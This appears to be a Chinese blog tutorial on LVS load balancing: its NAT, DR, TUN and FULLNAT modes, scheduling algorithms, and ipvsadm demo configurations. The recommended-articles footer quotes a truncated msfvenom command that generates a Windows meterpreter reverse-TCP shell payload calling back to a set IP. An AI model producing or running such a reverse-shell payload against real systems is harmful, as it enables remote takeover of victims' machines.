lvs类型

lvs-nat: 上下文为masquerade

多目标的DNAT(iptables): 它通过修改请求报文的目标IP地址(同时可能会修改目标端口)至挑选出某RS的RIP地址实现转发;

特性:

(1)RS 应该和DIP使用私网地址,且RS的网关要指向DIP
(2)请求和响应报文都要经由director转发:极高负载的场景中,director可能会成为系统性能瓶颈 
(3)支持端口映射
(4)RS可以使用任意OS
(5)RS的RIP和Director的DIP必须在同一IP网络

lvs-dr: direct routing,上下文为gateway

它通过修改请求报文的目标MAC地址进行转发

   Director: VIP,DIP       RSs: RIP,VIP

特性:

 (1)保证前端路由器将目标IP为VIP的请求报文发送给director;      
    解决办法:        
      静态绑定        
      arptables        
      修改RS主机内核的参数
        arp_announce:是否接收别人的通告并记录别人的通告,以及我们是否通告给别人  
          0:默认值,向每一个接口通告自己所有的地址
          1:尽量不向非本网络通告地址
          2:只能向网络通告最佳本地地址
        arp_ignore: 是否响应别人的请求
          0:默认值,只要有请求的地址就响应
          1:请求从哪个接口进来就哪个接口响应
(2) RS的RIP可以使用私有地址;但也可以使用公网地址 (3)RS根Director必须在同一物理网络中 (4)请求报文经由Director调度,但响应报文一定不能经由Director; (5)不支持端口映射 (6)RS可以大多数OS (7) RS的网关不能指向DIP

lvs-tun(tunneling): 上下文为ipip

不修改请求 报文的ip首部,而是通过在原有的ip首部(cip <--> vip)之外,再封装一个ip首部(dip <--> rip);

 特性:

  (1) RIP,DIP,VIP全得是公网地址

  (2) RS的网关不能指向DIP

  (3) 请求报文必须经由director调度,但响应报文必须不能经由director

  (4) 不支持端口映射

  (5) RS的OS必须支持隧道功能

lvs-fullnat:(keepalived)

  director通过同时修改请求报文的目标地址和源地址进行转发

 特性:

  (1) VIP是公网地址;RIP和DIP是私网地址,二者无须在同一网络中

  (2) RS接收到的请求报文的源地址为DIP,因此要响应给DIP

  (3) 请求报文和响应报文都必须经由Director

  (4) 支持端口映射机制

  (5) RS可以使用任意OS

lvs调度方法

静态方法: 仅根据算法本身进行调度

RR: round robin, 轮调
WRR: weight rr,带权重的RR
SH: source hash, 实现session保持的机制;将来自于同一个IP的请求始终调度至同一RS,内部维护一个hash表,反向代理时为缓存做负载均衡
DH: destination hash,将对同一个目标的请求始终发往同一个RS,正向代理时为缓存做负载均衡

动态方法: 根据算法及各RS的当前负载状态进行调度  

LC: Least Connection
  

  Overhead=Active*256+Inactive

WLC: Weight LC
  

  Overhead=(Active*256+Inactive)/weight

SED: Shortest Expection Delay
  

  Overhead=(Active+1)*256/weight

NQ: Never Queue
  

  SED算法的改进

LBLC: Locality-Based LC,即为动态的DH算法
  

  正向代理情形下的cache server调度

LBLCR:Locality-Based Least-Connection with Replication,带复制功能的LBLC算法  

lvs-nat和lvs-dr模型演示:

以192.168.1.101 - 105为例,下面以101,102 ... 105做编号

lvs-nat

我们要架构的lvs-nat如下:

准备环境:

我们给101加一块网卡,添加另一块网卡的ip地址192.168.20.1
接着把102和103的ip分别设为20.7和20.8,并且他们各自的默认网关是20.1
20.7启动一个web服务,添加index.html
20.8启动一个web服务,添加index.html
每台主机上都关掉iptables防火墙
打开转发功能: net.ipv4.ip_forward=1

ipvsadm管理命令:

# ipvsadm -A -t 192.168.1.101:80 -s rr
# ipvsadm -a -t 192.168.1.101:80 -r 192.168.20.7 -m
# ipvsadm -a -t 192.168.1.101:80 -r 192.168.20.8 -m
测试: 浏览器可以测试访问:http://192.168.1.101

lvs-dr

我们要架构的lvs-dr如下:

工作特性:

客户端发起请求,到达前端路由器,请求的目标地址是VIP地址,所以路由器要把请求转发给director,也必须是director,
而由于调度器和server都有VIP地址,所以我们要让server不能在ARP解析请求的时候作出相应,
解决方法有三个:
  1.配置路由器ARP地址表,明确表示MAC地址是调度器的MAC地址,但是如果director挂了,即使有备用的director,由于MAC地址不一样,所以就不能解决问题了
  2.在real server上配置ARP tables规则,明确表示当收到目标地址为VIP的请求时,server不做响应,让请求报文进不来或者响应报文出不去,这种解决方案要确保server支持ARP tables
  3.server上,把VIP定义在lo接口的别名上,而不是物理网卡的别名上,还可以配置linux内核参数,使得即便目标地址是VIP,server也不做响应

dr模型director将报文转发至real server时是根据修改MAC地址实现的,也就是说请求报文从路由器到director,源MAC是路由器接口的MAC,目标MAC是dierctor上VIP所在物理网卡的MAC, 然后director广播解析请求,获得每一个RIP的MAC地址,director转发至real server时,(通常情况下,director上有一块网卡,DIP配置在网络接口上,VIP配置在别名上 ),源MAC是DIP所在物理网卡的MAC地址,目标MAC是挑选出的real server上的RIP所在网卡的MAC地址,director修改完MAC地址后转发,如上图红色箭头所示,dirctor将报文扔给交换机,交换机将报文扔给real server,
报文在real server上流向如下图所示,报文经由RIP网卡到VIP所在网卡lo上,lo接口再到用户空间的应用程序上,应用程序构建响应报文后,让报文强行经由lo接口再通过RIP所在物理网卡转发出去。
如上图蓝色箭头所示,响应报文给客户端,源ip是VIP,目标ip是CIP,如果RIP,VIP,DIP在同一个网段,RIP的网关直接指向前端路由器,如果不是在同一个网段,那么RIP指向另一个路由器,然后到达客户端

下面我们来搭建dr模型的架构:

1. RIP, VIP,DIP三者在同一个网段中,架构如下:

相关配置:

director:
  配置网卡:
    # ifconfig eth0:0 192.168.1.111/32 broadcast 192.168.1.111 up
    # route add -host 192.168.1.111 dev eth0:0 RS:
  添加两个内核参数:arp_ignore,arp_announce
    # echo 1 > /proc/sys/net/ipv4/conf/all/arp_ignore
    # echo 1 > /proc/sys/net/ipv4/conf/eth0/arp_ignore
    # echo 2 > /proc/sys/net/ipv4/conf/all/arp_announce
    # echo 2 > /proc/sys/net/ipv4/conf/eth0/arp_announce
  
  配置lo接口
    # ifconfig lo:0 192.168.1.111/32 broadcast 192.168.1.111 up  
    # route add -host 192.168.1.111 dev lo:0  director写ipvsadm管理命令:
    # ipvsadm -A -t 192.168.1.111:80 -s rr
    # ipvsadm -a -t 192.168.1.111:80 -r 192.168.1.102 -g
    # ipvsadm -a -t 192.168.1.111:80 -r 192.168.1.103 -g
测试: 浏览器访问:http://192.168.1.111





lvs基础的更多相关文章

  1. 【Services】【Web】【LVS】lvs基础概念

    1.简介 1.1. 作者:张文嵩,就职于阿里 1.2. LVS是基础四层路由.四层交换的软件,他根据请求报文的目标IP和目标PORT将其调度转发至后端的某主机: 1.3. IPTABLES的请求转发路 ...

  2. lvs基础及部署

    LVS简介   LVS--Linux Vritual Server 即linux虚拟服务器,1998年5月由章文嵩博士开发并开源,目前全球多个国家的企业单位都在使用LVS构建集群服务.   LVS可实 ...

  3. LVS基础知识

    LVS介绍(Linux Virtual Server) 负载调度器,已经集成到内核 工作原理:VS根据请求报文的目标IP和目标协议及端口将其调度转发至某RS,根据调度算法来挑选RS iptables/ ...

  4. LVS入门篇(二)之LVS基础

    1. LVS介绍 LVS是Linux虚拟服务器(LinuxVirtualServers),使用负载均衡技术将多台服务器组成一个虚拟服务器.它为适应快速增长的网络访问需求提供了一个负载能力易于扩展,而价 ...

  5. LVS+keepalived实现负载均衡

    背景:         随着你的网站业务量的增长你网站的服务器压力越来越大?需要负载均衡方案!商业的硬件如F5又太贵,你们又是创业型互联公司如何有效节约成本,节省不必要 的浪费?同时实现商业硬件一样的 ...

  6. 【面试虐菜】—— LVS负载均衡

    Load Balancer(负载均衡器): Load Balancer是整个集群系统的前端,负责把客户请求转发到Real Server上.Load Balancer通过Ldirectord监测各Rea ...

  7. LVS+Keepalived实现高可用集群

    LVS+Keepalived实现高可用集群来源: ChinaUnix博客 日期: 2009.07.21 14:49 (共有条评论) 我要评论 操作系统平台:CentOS5.2软件:LVS+keepal ...

  8. LVS概述

    LVS原理概述: lvs是一个开源软件,是Linux virtual server的简写,即linux虚拟服务器,是一个虚拟的服务器集群系统,lvs集群采用ip负载均衡技术和基于内容的请求分发技术.将 ...

  9. LVS+Keepalived实现DBProxy的高可用

    背景 在上一篇文章美团点评DBProxy读写分离使用说明实现了读写分离,但在最后提了二个问题:一是代理不管MySQL主从的复制状态,二是DBProxy本身是一个单点的存在.对于第一个可以通过自己定义的 ...

随机推荐

  1. 记一个实时Linux的中断线程化问题

    背景 有一个项目对实时性要求比较高,于是在linux内核上打了RT_PREEMPT补丁. 最终碰到的一个问题是,芯片本身性能不强,CPU资源不足,急需优化. 初步分析 看了下cpu占用率,除了主应用之 ...

  2. bootstrap 图片类 和 按钮类 部分

    bootstrap框架,来自 Twitter,基于 html ,css ,js.简介灵活. 首先引入  bootstrap.js   bootstrap.css  及 jquery.js  这里不考虑 ...

  3. Shiro自动登录

    Shiro RememberMe spring.xml <bean class="org.apache.shiro.web.mgt.DefaultWebSecurityManager& ...

  4. 腾讯云Centos服务器部署问题

    在Centos7上部署Tomcat过程 下载并安装JDK 下载并部署Tomcat 打开Centos中对应的端口(默认80) 这几步操作很清楚,但首次使用Centos7时遇到了一个问题,外网无法访问服务 ...

  5. node - 简单的爬虫案例

    cherrio模块 安装 cnpm install cherrio 使用方法 const cheerio = require('cheerio') const $ = cheerio.load('&l ...

  6. ubuntu14.04安装mysql5.6.37

    摘抄这篇文档是为了记录自己的日常学习情况,方便以后查看.后边注明了来源,如有不对的地方,希望大家指正,谢谢! 首先从mysql官网上下载所需的离线包,我现在的版本是(mysql-5.6.37-linu ...

  7. Admin后台权限管理、三大认证

    目录 APIView的请求生命周期 三大认证规则 权限六表 自定义User表 详细配置演示 models.py setting.py admin.py 使用过程: 控制填写信息的字段 控制添加权限 控 ...

  8. msf制作反弹shell

    msf制作shell 1 .制作反弹shell-exe文件 执行命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LP ...

  9. To use the new Server Discover and Monitoring engine, pass option { useUnifiedTopology: true } to the MongoClient constructor.

    mongoose报错:DeprecationWarning: current Server Discovery and Monitoring engine is deprecated, and wil ...

  10. Mac将本地文件上传到Centos7(Linux)服务器上

    1.打开终端,输入命令: scp /Users/codez/Downloads/jdk-8u144-linux-x64.tar.gz root@139.224.235.xxx:/root/java/j ...